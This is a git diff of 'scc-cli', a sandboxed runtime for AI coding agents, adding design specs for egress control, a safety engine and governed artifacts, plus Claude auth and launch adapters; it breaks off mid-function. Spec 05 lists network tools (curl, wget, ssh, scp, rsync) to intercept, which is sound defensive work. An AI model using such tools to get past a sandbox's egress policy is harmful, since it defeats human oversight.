+# --- Logging to stdout --- +access_log stdio:/dev/stdout + +# --- Cache disabled --- +cache deny all diff --git a/pyproject.toml b/pyproject.toml index 0656ce3..1297cc6 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,13 +5,25 @@ build-backend = "hatchling.build" [project] name = "scc-cli" version = "1.7.3" -description = "Run Claude Code in Docker sandboxes with team configs and git worktree support" +description = "Governed runtime for AI coding agents with container sandboxes, network controls, and team-managed configuration" readme = "README.md" license = "MIT" authors = [ { name = "Cagri Cimen", email = "cagricimeenn@gmail.com" } ] -keywords = ["claude", "ai", "cli", "docker", "git", "worktree"] +keywords = [ + "ai", + "coding-agent", + "claude-code", + "codex", + "sandbox", + "cli", + "container", + "security", + "governance", + "developer-tools", + "worktree", +] classifiers = [ "Development Status :: 4 - Beta", "Environment :: Console", @@ -47,8 +59,8 @@ dev = [ scc = "scc_cli.cli:main" [project.urls] -Homepage = "https://github.com/CCimen/scc" -Documentation = "https://github.com/CCimen/scc#readme" +Homepage = "https://scc-cli.dev" +Documentation = "https://scc-cli.dev" Repository = "https://github.com/CCimen/scc" Issues = "https://github.com/CCimen/scc/issues" @@ -78,6 +90,7 @@ ignore = ["E501"] "src/scc_cli/cli_org.py" = ["T201"] # Schema output for piping "src/scc_cli/cli_worktree.py" = ["T201"] # Path output for scripting: cd $(scc worktree list -i) "tests/**/*.py" = ["T201"] # Tests may use print() freely +"images/**/scc_safety_eval/*.py" = ["T201"] # Standalone CLI uses print() for stderr output # UP037: Explicit string annotation kept as defensive measure (guards against __future__ removal) "src/scc_cli/theme.py" = ["UP037"] diff --git a/specs/01-repo-baseline-and-migration.md b/specs/01-repo-baseline-and-migration.md new file mode 100644 index 0000000..cedafd9 --- /dev/null +++ b/specs/01-repo-baseline-and-migration.md @@ -0,0 +1,16 @@ +# Spec 01 — Repo Baseline And Migration + +## Objective +Establish `scc-sync-1.7.3` as the only active implementation root and perform a one-time migration away from legacy naming and stale compatibility assumptions. + +## Requirements +- Preserve the dirty `scc` tree as archive and rollback evidence. +- Do not continue active implementation in the archived tree. +- Migrate docs, configs, fixtures, and tests to the truthful network vocabulary in one pass. +- Remove long-term compatibility aliases from planned core surfaces after migration. +- Green baseline is required before further architecture work. + +## Acceptance criteria +- Active work happens only in `scc-sync-1.7.3`. +- Old network names are absent from core contracts and new tests. +- Verification gate passes on the synced repo. diff --git a/specs/02-control-plane-and-types.md b/specs/02-control-plane-and-types.md new file mode 100644 index 0000000..391247f --- /dev/null +++ b/specs/02-control-plane-and-types.md @@ -0,0 +1,31 @@ +# Spec 02 — Control Plane And Types + +## Objective +Make application-layer policy and launch planning typed and provider-neutral. + +## Required models +- `RuntimeInfo` +- `ProviderCapabilityProfile` +- `AgentLaunchSpec` +- `NetworkPolicyPlan` +- `DestinationSet` +- `EgressRule` +- `SafetyPolicy` +- `SafetyVerdict` +- `AuditEvent` +- `GovernedArtifact` +- `ArtifactBundle` +- `ArtifactInstallIntent` +- `ProviderArtifactBinding` +- `ArtifactRenderPlan` + +## Rules +- Raw dictionaries may exist only at parsing and serialization boundaries. +- Human CLI and JSON output must share a stable error category model. +- Audit event shape must be shared by network and safety paths. +- Org/team/project/user artifact intent must be expressed in provider-neutral models, not + in `.claude` or `.codex` file shapes. +- Shared skills, MCP definitions, and provider-native integrations must carry provenance, + pinning, approval state, and installation intent in one typed control-plane model. +- Provider adapters may render native artifacts from an `ArtifactRenderPlan`, but the + control plane must not treat provider plugin references as the canonical policy shape. diff --git a/specs/03-provider-boundary.md b/specs/03-provider-boundary.md new file mode 100644 index 0000000..f479844 --- /dev/null +++ b/specs/03-provider-boundary.md @@ -0,0 +1,34 @@ +# Spec 03 — Provider Boundary + +## Objective +Move provider-specific behavior into adapters. + +## Provider contract +`AgentProvider.prepare_launch(...) -> AgentLaunchSpec` + +## Provider responsibilities +- auth resolution +- rendering governed artifacts into provider-native files and install surfaces +- provider launch argv/env/workdir +- provider-core destination set +- native UX integrations such as hooks, rules, plugins, AGENTS/CLAUDE guidance files, and config files + +## Core rules +- Core must not depend on `.claude` or `.codex` layouts directly. +- Provider-native features are not hard enforcement. +- Open Agent Skills are the only intended shared portability surface. +- One org/team/project/user policy should drive both providers; adapters are responsible for + translating the same effective artifact plan into Claude- or Codex-native layouts. +- Provider-native component shapes are asymmetric. Claude plugins may carry hooks, agents, and + LSP, while Codex plugins bundle skills, apps, and MCP and rely on separate rules, hooks, + config, and `AGENTS.md` layers. Core must not flatten those differences into one generic + plugin contract. +- Provider capability profiles must stay truthful about what is actually implemented for that + provider, including skills support, resume support, and native integrations. +- Claude owns `.claude` config, `CLAUDE.md`-adjacent native guidance, hook wiring, and any + Claude marketplace/plugin assets. +- Codex owns `.codex` config, `.codex/rules/*.rules`, `.codex/hooks.json`, `AGENTS.md`-adjacent + native guidance, `.codex-plugin/plugin.json`, local plugin bundles, and repo or user + marketplace entries under `.agents/plugins/marketplace.json`. +- Codex rules and hooks are adapter-owned native guardrails and UX surfaces, not the hard + enforcement boundary. SCC-owned runtime wrappers and topology remain the hard control. diff --git a/specs/04-runtime-and-egress.md b/specs/04-runtime-and-egress.md new file mode 100644 index 0000000..0270c17 --- /dev/null +++ b/specs/04-runtime-and-egress.md @@ -0,0 +1,58 @@ +# Spec 04 — Runtime And Enforced Web Egress + +## Objective +Ship a portable OCI runtime with honest and enforceable web egress control. + +## Runtime targets +- plain OCI first +- Docker Engine / OrbStack / Colima-style Docker CLI first +- Podman next +- no Docker Desktop dependency + +## Network modes +- `open` +- `web-egress-enforced` +- `locked-down-web` + +## Enforced topology +- agent on internal-only network +- proxy is the only component with internal + external attachment +- no host networking +- deny IP literals by default +- deny loopback, private, link-local, and metadata endpoints by default +- ACLs evaluate requested host and resolved IP/CIDR + +## Control model +- `open` is the low-friction mode and should not make hard isolation claims +- `web-egress-enforced` is the recommended enterprise mode when external web access is needed with bounded destinations +- `locked-down-web` is the strictest mode and must block launches that require provider-core web access +- v1 enforced egress is HTTP/HTTPS-focused only and must not be described as generic arbitrary TCP/UDP isolation + +## Governance model +- org policy owns the baseline mode, hard deny overlays, the named destination-set catalog, and delegation rules +- team policy may widen effective egress only within org-delegated bounds, typically by selecting approved named destination sets +- project and user scopes may narrow only; they must not widen effective egress in v1 +- named destination sets are the primary abstraction, not raw per-user host lists +- provider-core destination sets are automatic for the selected provider only; broader developer or internal service access remains an explicit org/team choice + +## Active team context +- every workspace/session runs under exactly one active team context +- users who belong to multiple teams switch context between those teams; SCC must not implicitly union multiple team allowlists for one session +- if a combined posture is genuinely needed, it should be published as an explicit reviewed team profile rather than assembled ad hoc on a laptop + +## Enforcement details +- in `web-egress-enforced`, SCC-computed proxy settings are authoritative; inherited host proxy environment variables must not weaken or override enforced behavior +- the agent container gets exactly one internal-only network attachment in enforced mode +- the proxy sidecar is the only component attached to both the internal network and an egress-facing network +- topology plus proxy policy are the hard control; wrappers and provider-native integrations are defense-in-depth, UX, and audit layers +- hard deny overlays remain active even when a destination set would otherwise widen access + +## Truthfulness requirements +- SCC must not claim "isolated" or "cannot reach company systems" unless the runtime topology and policy on the active backend actually enforce that statement +- if IPv6 is not enforced in v1, SCC must either disable it in the enforced path or state clearly that enforced egress is IPv4-only for now +- operator diagnostics must answer which runtime/backend is active, which team context is active, which mode is active, which destination sets are effective, and why a launch or request was blocked + +## Governance +- org sets baseline mode, named sets, and delegation rules +- teams may widen only within delegated bounds +- projects/users may narrow only diff --git a/specs/05-safety-engine.md b/specs/05-safety-engine.md new file mode 100644 index 0000000..4a32416 --- /dev/null +++ b/specs/05-safety-engine.md @@ -0,0 +1,17 @@ +# Spec 05 — Safety Engine + +## Objective +Provide one cross-agent runtime safety baseline. + +## Shared contract +`SafetyEngine.evaluate(...) -> SafetyVerdict` + +## V1 command families +- destructive git +- explicit network tools: `curl`, `wget`, `ssh`, `scp`, `sftp`, `rsync` with remote target + +## Rules +- fail closed when policy cannot be loaded or validated +- runtime wrappers are the hard cross-agent baseline +- provider-native integrations improve UX and audit context only +- in enforced web-egress modes, wrappers for explicit network tools are defense-in-depth and better denial/audit UX; topology plus egress policy remain the hard network control diff --git a/specs/06-governed-artifacts.md b/specs/06-governed-artifacts.md new file mode 100644 index 0000000..f0750dc --- /dev/null +++ b/specs/06-governed-artifacts.md @@ -0,0 +1,286 @@ +# Spec 06 — Governed Artifacts + +## Objective +Govern approved skills and provider-native integrations without inventing an SCC-only workflow format. + +## Shared portability surface +- open Agent Skills only + +## Canonical control-plane model +- `GovernedArtifact` is the approved reusable unit in SCC policy. +- `ArtifactBundle` is the team-facing selection unit. Teams should enable bundles, not raw + provider plugin references. +- `ProviderArtifactBinding` holds provider-native rendering details only when needed. +- `ArtifactRenderPlan` is the effective per-session/per-provider materialization plan produced + after org/team/project/user policy merge. + +## Artifact kinds +- `skill` + - open Agent Skills package + - shared across Claude and Codex whenever possible +- `mcp_server` + - provider-neutral MCP definition plus transport metadata + - may be rendered directly or bundled into a native integration package +- `native_integration` + - provider-specific hooks, rules, local plugin folders, marketplace metadata, app bindings, + or other native UX glue +- `bundle` + - named approved grouping of skills, MCP servers, and native integrations + - the preferred unit for org defaults and team enablement + +## Provider surface notes +- Claude: + - plugin is a self-contained directory that may include skills, agents, hooks, MCP servers, + LSP config, and plugin-scoped settings + - marketplace/plugin install surfaces are Claude-native and adapter-owned + - standalone skills and `CLAUDE.md`-family instructions remain separate native guidance layers + - Claude plugin capabilities are broader than Codex plugin capabilities; SCC must not treat + Claude's plugin shape as the generic cross-provider plugin contract +- Codex: + - plugin is a self-contained directory rooted by `.codex-plugin/plugin.json` + - Codex plugins bundle skills, apps, and MCP servers; rules and hooks are separate native + config surfaces, not plugin components + - `.codex/config.toml` is a native config surface for MCP definitions and plugin state + - repo and user marketplaces live at `.agents/plugins/marketplace.json` + - standalone skills live under `.agents/skills` + - rules live under `.codex/rules/*.rules` + - hooks live in `.codex/hooks.json` + - `AGENTS.md` is a separate instruction-discovery layer, not a plugin component + - Codex rules and hooks are native guardrail and UX surfaces; they are not the hard + enforcement boundary and should not be represented as if they were portable plugin content + +## Plugin semantics +- A plugin is a distribution unit, not the canonical SCC policy object. +- SCC should not force teams to author separate "Claude plugin config" and "Codex plugin config" + for the same workflow. +- Teams should select approved bundles once. Adapters may then materialize that bundle as: + - a Claude marketplace/plugin + hook configuration + - a Codex local plugin with `.codex-plugin/plugin.json` + - repo-local or user-local marketplace entries + - shared skill and MCP installation surfaces +- Bundles must remain audit-friendly. Their constituent skills, MCP servers, and native + integrations should stay individually visible for approval, provenance, and diagnostics. + +## Experience requirements +- Organization experience: + - curate one approved artifact catalog and one approved bundle catalog + - delegate what teams may enable without asking org admins to hand-author provider-native files + - review provenance, pinning, publisher metadata, and install intent in one place +- Team experience: + - choose approved bundles, not raw Claude marketplace entries or raw Codex plugin folders + - avoid dual maintenance of a "Claude team config" and a "Codex team config" + - be able to see which bundle members are shared across providers and which members are + provider-native bindings +- Developer experience: + - switch between Claude and Codex with the same active org/team policy + - receive the closest truthful native projection for the chosen provider + - understand what SCC rendered, where it rendered it, and what was skipped + +## Rendering semantics +- Core computes one `ArtifactRenderPlan` from org/team/project/user policy. +- The selected provider adapter owns projection from that plan into provider-native files, + directories, and install surfaces. +- Projection must be deterministic and idempotent for a given effective plan, provider, and + workspace scope. +- Functional parity means the same approved SCC bundle produces the closest safe native outcome + on both providers. It does not require identical on-disk plugin structures. +- A single bundle may render as: + - one provider-native plugin package + - multiple standalone native files + - a mix of plugin package plus adjacent native config surfaces +- Claude projection may emit a plugin containing skills, agents, hooks, MCP, and LSP, or may + emit standalone native surfaces when that produces a simpler or more truthful result. +- Codex projection may emit a `.codex-plugin` bundle for skills, apps, and MCP, while also + emitting separate `.codex/hooks.json`, `.codex/rules/*.rules`, `.codex/config.toml`, and + `AGENTS.md` outputs. SCC must not try to force those Codex-native surfaces into the plugin + directory just to mimic Claude. + +## Recommended packaging model +- Preferred source of truth: + - one org-approved artifact repository or registry + - one canonical SCC bundle definition per team pack or shared capability pack + - bundle contents may include shared skills, shared MCP definitions, and provider-native + bindings in the same source tree +- Preferred team policy shape: + - team config references approved bundle IDs, not raw provider marketplace URLs + - org config maps those bundle IDs to approved source refs and pinning policy + - developers should not need to know whether the chosen provider ultimately consumes a plugin, + a marketplace entry, a rules file, or a hook file +- Optional distribution layer: + - CI may publish generated Claude or Codex marketplace artifacts for direct native use + - those published artifacts are build outputs, not the canonical SCC authoring model +- Product language may call this a "team pack" or "team plugin" for simplicity, but the + implementation should keep the provider-neutral bundle model underneath + +## Guidance and merge strategy +- Prefer skills for reusable team workflows and instruction sets. +- Reserve `AGENTS.md`, `CLAUDE.md`, rules, and hooks for: + - always-on policy + - native guardrails + - native UX affordances that cannot be expressed cleanly as a skill +- SCC should avoid overwriting developer-authored instruction or config files blindly. +- Where the native surface supports composition, SCC should use separate managed files. +- Where the native surface requires one canonical file, SCC should: + - merge deterministically + - preserve non-SCC content when safe + - mark SCC-managed sections or files clearly + - fail clearly instead of silently discarding user content +- In practice this means: + - Codex rules are a good fit for separate SCC-managed files under `.codex/rules/` + - Codex hooks, Codex `config.toml`, and similar single-file surfaces need explicit merge + strategy + - `AGENTS.md` and `CLAUDE.md` should be used sparingly because they are high-precedence + guidance layers that may already be owned by the repo +- If a bundle's guidance can be expressed as open Agent Skills, prefer that path over native + instruction-file rendering because it is more portable and less collision-prone + +## Governance model +- Org owns: + - approved artifact catalog + - approved bundle catalog + - approved public/private sources + - provenance, pinning, install intent defaults, and allowlist approval + - delegation rules for what teams may enable or add +- Team owns: + - bundle selection within org-delegated bounds + - optional team-local narrowing or additional approved bundles +- Project and user own: + - narrowing only + - local disablement, stricter defaults, or local opt-out + - request metadata for widening, but not effective widening in v1 +- Each workspace/session runs under one active team context. SCC must not implicitly union + multiple team artifact sets in one session. + +## Installation intent +- Canonical install intent should be provider-neutral and explain operator expectations. +- Recommended SCC intent values: + - `required` — render/install automatically for the selected provider + - `available` — expose for opt-in or browsing, not auto-enabled + - `disabled` — explicitly not allowed in the effective session + - `request-only` — visible as an approved request target, not effective until promoted +- Adapters may translate this into provider-native policy fields such as marketplace + installation flags or per-plugin enabled/disabled state. + +## Adapter-owned native integrations +- Claude renderer: + - `.claude` config and hook wiring + - Claude-native marketplace/plugin metadata and local marketplace materialization + - plugin-scoped assets such as agents or LSP config when a bundle calls for them + - optional provider-native skill placement when needed + - optional rendering of managed instruction content into Claude-native guidance surfaces +- Codex renderer: + - `.codex` config + - `.codex/rules/*.rules` + - `.codex/hooks.json` + - local plugin folders containing `.codex-plugin/plugin.json` + - optional `.mcp.json` and `.app.json` + - repo or user marketplace catalogs at `.agents/plugins/marketplace.json` + - Codex-native plugin enable/disable metadata + - optional rendering of managed instruction content into `AGENTS.md` or adjacent Codex-facing + instruction layers +- Native integrations must remain adapter-owned. Core policy should never depend on + `enabledPlugins`, `extraKnownMarketplaces`, or Codex marketplace JSON as canonical inputs. + +## Portability rules +- Skills are the primary cross-provider portability layer. +- MCP definitions should stay provider-neutral unless a provider-native binding is genuinely + required for packaging or UX. +- Provider-native hooks, rules, plugin manifests, and marketplace metadata are not portable and + must be rendered from the same governed artifact plan rather than authored separately per team. +- Persistent instruction layers such as `AGENTS.md`, `CLAUDE.md`, Codex rules, or provider hook + configs are native bindings. They may be derived from the same approved SCC bundle, but SCC + should not pretend they are interchangeable file formats. +- Claude plugin capability and Codex plugin capability are intentionally asymmetric. SCC should + preserve that asymmetry in adapter renderers instead of flattening both into one fake plugin + abstraction. +- When one provider lacks a native feature, SCC should still apply the shared parts of the plan + and report skipped native bindings truthfully in diagnostics. + +## Sources and pinning +- Artifact sources may be public or private repos, directories, or approved remote manifests. +- Every governed artifact and bundle should carry: + - source reference + - revision/ref or version pin + - approval status + - owner or publisher metadata + - audit-friendly identifier +- Team configs should reference approved artifact or bundle IDs, not raw URLs whenever possible. + +## Diagnostics and truthfulness +- SCC must show: + - active team context + - selected provider + - effective bundles and artifacts + - which parts are shared vs provider-native + - which bindings were rendered, skipped, or blocked + - which files or install surfaces were written for the current provider + - whether native files were rendered as standalone managed files, merged into an existing file, + or skipped to avoid conflict + - why a requested artifact was unavailable +- SCC must not claim Codex plugin parity until a real Codex renderer and installation path exist. +- Switching providers should re-render from the same effective artifact plan; it should not + require a second team policy file. + +## Example +```yaml +governed_artifacts: + artifacts: + code-review-skill: + kind: skill + source: + type: git + url: https://git.example.se/ai/agent-artifacts.git + path: skills/code-review + ref: v1.4.2 + install_intent: available + github-mcp: + kind: mcp_server + source: + type: git + url: https://git.example.se/ai/agent-artifacts.git + path: mcp/github.json + ref: v1.4.2 + install_intent: required + github-native: + kind: native_integration + install_intent: available + bindings: + claude: + hooks: ./claude/github-hooks.json + marketplace_bundle: ./claude/github-marketplace + codex: + plugin_bundle: ./codex/github-plugin + rules: ./codex/rules/github.rules + team-guidance: + kind: native_integration + install_intent: required + bindings: + claude: + instructions: ./claude/CLAUDE.team.md + codex: + instructions: ./codex/AGENTS.team.md + bundles: + github-dev: + members: + - code-review-skill + - github-mcp + - github-native + - team-guidance + install_intent: available +profiles: + ai-team: + enabled_bundles: + - github-dev +``` + +In this model the team selects `github-dev` once. SCC then renders the shared skill and MCP +everywhere it can, renders Codex rules/hooks/plugin metadata only for Codex sessions, renders +Claude-native marketplace/hooks only for Claude sessions, and can project approved team guidance +into provider-native instruction files without forcing two separate team policy documents. + +## Governance requirements +- provenance +- pinning +- installation intent +- allowlist approval +- auditability diff --git a/specs/07-verification-and-quality-gates.md b/specs/07-verification-and-quality-gates.md new file mode 100644 index 0000000..a4f8326 --- /dev/null +++ b/specs/07-verification-and-quality-gates.md @@ -0,0 +1,20 @@ +# Spec 07 — Verification And Quality Gates + +## Objective +Keep architecture work safe and maintainable. + +## Required gates +- `uv run ruff check` +- `uv run mypy src/scc_cli` +- `uv run pytest` + +## Test priorities +- characterization tests before large refactors +- contract tests for provider and runtime seams +- policy merge tests for org/team widening and project/user narrowing +- integration tests for provider-core destination validation and blocked private access +- safety tests for destructive git, explicit network tools, and fail-closed behavior + +## Maintainability rules +- re-enable size and complexity guardrails after core seams stabilize +- split orchestration only after characterization coverage exists diff --git a/src/scc_cli/__init__.py b/src/scc_cli/__init__.py index 9a15259..fd6907d 100644 --- a/src/scc_cli/__init__.py +++ b/src/scc_cli/__init__.py @@ -1,6 +1,6 @@ -"""SCC - Sandboxed Claude CLI. +"""SCC - Sandboxed Coding CLI. -Provide a command-line tool for safely running Claude Code in Docker sandboxes +Provide a command-line tool for safely running AI coding agents in Docker sandboxes with team-specific configurations and worktree management. """ diff --git a/src/scc_cli/adapters/claude_agent_provider.py b/src/scc_cli/adapters/claude_agent_provider.py new file mode 100644 index 0000000..4774009 --- /dev/null +++ b/src/scc_cli/adapters/claude_agent_provider.py @@ -0,0 +1,236 @@ +"""Claude Code adapter for AgentProvider port.""" + +from __future__ import annotations + +import json +import logging +import subprocess +from collections.abc import Mapping +from pathlib import Path +from typing import Any + +from scc_cli.adapters.claude_auth import run_claude_browser_auth +from scc_cli.adapters.claude_renderer import render_claude_artifacts +from scc_cli.core.contracts import ( + AgentLaunchSpec, + AuthReadiness, + ProviderCapabilityProfile, + RenderArtifactsResult, +) +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.governed_artifacts import ArtifactRenderPlan + +logger = logging.getLogger(__name__) + +_CLAUDE_OAUTH_FILE = ".credentials.json" +_CLAUDE_HOST_AUTH_FILE = ".claude.json" +_CLAUDE_DATA_VOLUME = "docker-claude-sandbox-data" + + +class ClaudeAgentProvider: + """AgentProvider implementation for Claude Code. + + Translates provider config and workspace context into a typed AgentLaunchSpec + that the runtime layer can consume without importing Claude internals directly. + """ + + def capability_profile(self) -> ProviderCapabilityProfile: + return ProviderCapabilityProfile( + provider_id="claude", + display_name="Claude Code", + required_destination_set="anthropic-core", + supports_resume=True, + supports_skills=True, + supports_native_integrations=True, + ) + + def auth_check(self) -> AuthReadiness: + """Check whether Claude auth credentials are cached in the data volume.""" + volume = _CLAUDE_DATA_VOLUME + mechanism = "oauth_file" + + # Step 1: volume existence + try: + vol_result = subprocess.run( + ["docker", "volume", "inspect", volume], + capture_output=True, + timeout=10, + ) + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=f"Cannot reach Docker to check volume '{volume}'", + ) + + if vol_result.returncode != 0: + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance="Run 'scc start --provider claude' to perform initial auth setup", + ) + + oauth_state = _read_volume_json(volume, _CLAUDE_OAUTH_FILE) + if oauth_state == "present": + return AuthReadiness( + status="present", + mechanism=mechanism, + guidance="Claude auth cache present — no action needed", + ) + if oauth_state == "invalid": + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth file '{_CLAUDE_OAUTH_FILE}' contains invalid JSON. " + "Run 'scc start --provider claude' to re-authenticate." + ), + ) + + host_state = _read_volume_json(volume, _CLAUDE_HOST_AUTH_FILE) + if host_state == "present": + return AuthReadiness( + status="present", + mechanism=mechanism, + guidance="Claude auth cache present — no action needed", + ) + if host_state == "invalid": + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth file '{_CLAUDE_HOST_AUTH_FILE}' contains invalid JSON. " + "Run 'scc start --provider claude' to re-authenticate." + ), + ) + + return AuthReadiness( + status="missing", + mechanism=mechanism, + guidance=( + f"Auth files '{_CLAUDE_OAUTH_FILE}' and '{_CLAUDE_HOST_AUTH_FILE}' " + f"not found in volume '{volume}'. Run 'scc start --provider claude' " + "to authenticate." + ), + ) + + def bootstrap_auth(self) -> None: + """Establish Claude auth using the provider's own browser flow.""" + return_code = run_claude_browser_auth() + readiness = self.auth_check() + if readiness.status == "present": + return + if return_code != 0: + raise ProviderNotReadyError( + provider_id="claude", + user_message="Claude browser sign-in did not complete successfully.", + suggested_action="Retry the sign-in flow and complete the provider login.", + ) + raise ProviderNotReadyError( + provider_id="claude", + user_message="Claude sign-in finished, but no reusable auth cache was written.", + suggested_action="Retry the sign-in flow and confirm the provider login completed.", + ) + + def prepare_launch( + self, + *, + config: Mapping[str, Any], + workspace: Path, + settings_path: Path | None = None, + ) -> AgentLaunchSpec: + """Build a Claude-owned launch specification for one workspace. + + Args: + config: Rendered agent settings payload (plugins, mcpServers, etc.). + Consumed by the settings artifact; not injected as env vars. + workspace: Launch working directory. + settings_path: Container path for the rendered settings.json artifact, + if any was built by the sync path. + + Returns: + Typed launch spec carrying Claude's argv, workdir, and artifact paths. + """ + artifact_paths: tuple[Path, ...] = (settings_path,) if settings_path is not None else () + return AgentLaunchSpec( + provider_id="claude", + argv=("claude", "--dangerously-skip-permissions"), + env={}, + workdir=workspace, + artifact_paths=artifact_paths, + required_destination_sets=("anthropic-core",), + ) + + def render_artifacts( + self, + plan: ArtifactRenderPlan, + workspace: Path, + ) -> RenderArtifactsResult: + """Render governed artifacts into Claude-native surfaces. + + Delegates to :func:`claude_renderer.render_claude_artifacts` and wraps + the adapter-specific ``RendererResult`` into the provider-neutral + ``RenderArtifactsResult`` for the launch pipeline. + + Args: + plan: ArtifactRenderPlan targeting provider ``'claude'``. + workspace: Root directory for the workspace (project root). + + Returns: + RenderArtifactsResult with rendered paths, skipped artifacts, + warnings, and a settings fragment for the caller to merge. + + Raises: + RendererError: If fail-closed rendering encounters a failure. + """ + result = render_claude_artifacts(plan, workspace) + logger.info( + "Claude renderer: %d paths rendered, %d skipped, %d warnings for bundle '%s'", + len(result.rendered_paths), + len(result.skipped_artifacts), + len(result.warnings), + plan.bundle_id, + ) + return RenderArtifactsResult( + rendered_paths=result.rendered_paths, + skipped_artifacts=result.skipped_artifacts, + warnings=result.warnings, + settings_fragment=result.settings_fragment, + ) + + +def _read_volume_json(volume: str, auth_file: str) -> str: + """Return ``present``, ``missing``, or ``invalid`` for one Claude auth file.""" + try: + file_result = subprocess.run( + [ + "docker", + "run", + "--rm", + "-v", + f"{volume}:/check", + "alpine", + "cat", + f"/check/{auth_file}", + ], + capture_output=True, + timeout=30, + ) + except (subprocess.TimeoutExpired, FileNotFoundError, OSError): + return "missing" + + if file_result.returncode != 0: + return "missing" + + content = file_result.stdout.strip() + if not content: + return "missing" + + try: + parsed = json.loads(content) + except (json.JSONDecodeError, ValueError): + return "invalid" + + if auth_file == _CLAUDE_HOST_AUTH_FILE: + return "present" if isinstance(parsed, dict) and parsed.get("oauthAccount") else "missing" + return "present" if parsed else "missing" diff --git a/src/scc_cli/adapters/claude_agent_runner.py b/src/scc_cli/adapters/claude_agent_runner.py index 7ae6a77..1053b5d 100644 --- a/src/scc_cli/adapters/claude_agent_runner.py +++ b/src/scc_cli/adapters/claude_agent_runner.py @@ -2,6 +2,7 @@ from __future__ import annotations +import json from pathlib import Path from typing import Any @@ -17,7 +18,8 @@ class ClaudeAgentRunner(AgentRunner): def build_settings( self, config: dict[str, Any], *, path: Path = DEFAULT_SETTINGS_PATH ) -> AgentSettings: - return AgentSettings(content=config, path=path) + rendered = json.dumps(config, indent=2, sort_keys=True).encode() + return AgentSettings(rendered_bytes=rendered, path=path, suffix=".json") def build_command(self, settings: AgentSettings) -> AgentCommand: return AgentCommand(argv=["claude"], env={}, workdir=settings.path.parent) diff --git a/src/scc_cli/adapters/claude_auth.py b/src/scc_cli/adapters/claude_auth.py new file mode 100644 index 0000000..d198e15 --- /dev/null +++ b/src/scc_cli/adapters/claude_auth.py @@ -0,0 +1,74 @@ +"""Host-browser auth bootstrap for containerized Claude sessions.""" + +from __future__ import annotations + +import subprocess +from pathlib import Path + +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.provider_registry import get_runtime_spec + + +def build_claude_browser_auth_command() -> list[str]: + """Build the host-side Claude login command.""" + return ["claude", "auth", "login", "--claudeai"] + + +def run_claude_browser_auth() -> int: + """Run browser-based Claude login, then sync the resulting cache to Docker.""" + try: + result = subprocess.run(build_claude_browser_auth_command(), check=False) + except FileNotFoundError as exc: + raise ProviderNotReadyError( + provider_id="claude", + user_message=( + "Claude browser sign-in cannot start because the host 'claude' CLI " + "is not installed." + ), + suggested_action=( + "Install Claude Code on the host, or connect Claude later from an " + "environment where the host CLI is available." + ), + ) from exc + + if result.returncode == 0: + _sync_host_claude_auth_to_volume() + return result.returncode + + +def _sync_host_claude_auth_to_volume() -> None: + """Copy host Claude auth files into the persistent Docker volume.""" + spec = get_runtime_spec("claude") + for source_path, volume_filename in _host_claude_auth_files().items(): + if not source_path.exists(): + continue + + subprocess.run( + [ + "docker", + "run", + "--rm", + "-i", + "-v", + f"{spec.data_volume}:/data", + "alpine", + "sh", + "-lc", + ( + f"cat > /data/{volume_filename} && " + f"chown 1000:1000 /data/{volume_filename} && " + f"chmod 0600 /data/{volume_filename}" + ), + ], + input=source_path.read_text(), + text=True, + capture_output=True, + check=False, + ) + + +def _host_claude_auth_files() -> dict[Path, str]: + """Return host Claude auth files that should be imported into the volume.""" + return { + Path.home() / ".claude.json": ".claude.json", + } diff --git a/src/scc_cli/adapters/claude_renderer.py b/src/scc_cli/adapters/claude_renderer.py new file mode 100644 index 0000000..0901a27 --- /dev/null +++ b/src/scc_cli/adapters/claude_renderer.py @@ -0,0 +1,553 @@ +"""Claude renderer: project ArtifactRenderPlan into Claude-native surfaces. + +Adapter-owned renderer that consumes a provider-neutral ArtifactRenderPlan +and projects it into Claude Code's native file structures and settings. + +Claude-native surfaces (per spec-06): +- Skills: writes ``skill.json`` metadata under ``.claude/.scc-managed/skills/{name}/`` +- MCP servers: produces ``mcpServers`` entries in the settings fragment +- Native integrations (metadata-only — the renderer writes SCC-managed + JSON metadata files, not the actual native content): + - ``.claude/.scc-managed/hooks/{name}.json``: hook metadata + - ``settings_fragment.extraKnownMarketplaces``: marketplace source entries + - ``settings_fragment.enabledPlugins``: plugin enablement entries + - ``.claude/.scc-managed/instructions/{name}.json``: instruction metadata + +The renderer is deterministic and idempotent — the same plan + workspace +always produce the same output. Actual content fetching (git clone, URL +download) is NOT the renderer's job; it writes metadata and references that +the launch pipeline or runtime can later resolve. +""" + +from __future__ import annotations + +import json +import logging +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any + +from scc_cli.core.errors import MaterializationError +from scc_cli.core.governed_artifacts import ( + ArtifactKind, + ArtifactRenderPlan, + PortableArtifact, + ProviderArtifactBinding, +) + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# Renderer result +# --------------------------------------------------------------------------- + + +@dataclass(frozen=True) +class RendererResult: + """Result of rendering an ArtifactRenderPlan to Claude-native surfaces. + + Attributes: + rendered_paths: Files/directories written to workspace. + skipped_artifacts: Artifact names that were in the plan but could not + be rendered (carried from the plan or added by the renderer). + warnings: Non-fatal issues encountered during rendering. + settings_fragment: Dict fragment to merge into settings.local.json. + Caller (launch pipeline) owns the actual merge. + """ + + rendered_paths: tuple[Path, ...] = () + skipped_artifacts: tuple[str, ...] = () + warnings: tuple[str, ...] = () + settings_fragment: dict[str, Any] = field(default_factory=dict) + + +# --------------------------------------------------------------------------- +# Constants +# --------------------------------------------------------------------------- + +# SCC-managed output directory within the Claude workspace. +# Keeps bundle-rendered content separate from user-authored Claude files. +SCC_MANAGED_DIR = ".claude/.scc-managed" +SKILLS_SUBDIR = "skills" +HOOKS_SUBDIR = "hooks" +INSTRUCTIONS_SUBDIR = "instructions" + +# Known native_config keys for Claude native integrations. +_INTEGRATION_KEYS = frozenset({"hooks", "marketplace_bundle", "plugin_bundle", "instructions"}) + + +# --------------------------------------------------------------------------- +# Binding dispatch helpers +# --------------------------------------------------------------------------- + + +def _render_skill_binding( + binding: ProviderArtifactBinding, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], list[str]]: + """Render a skill 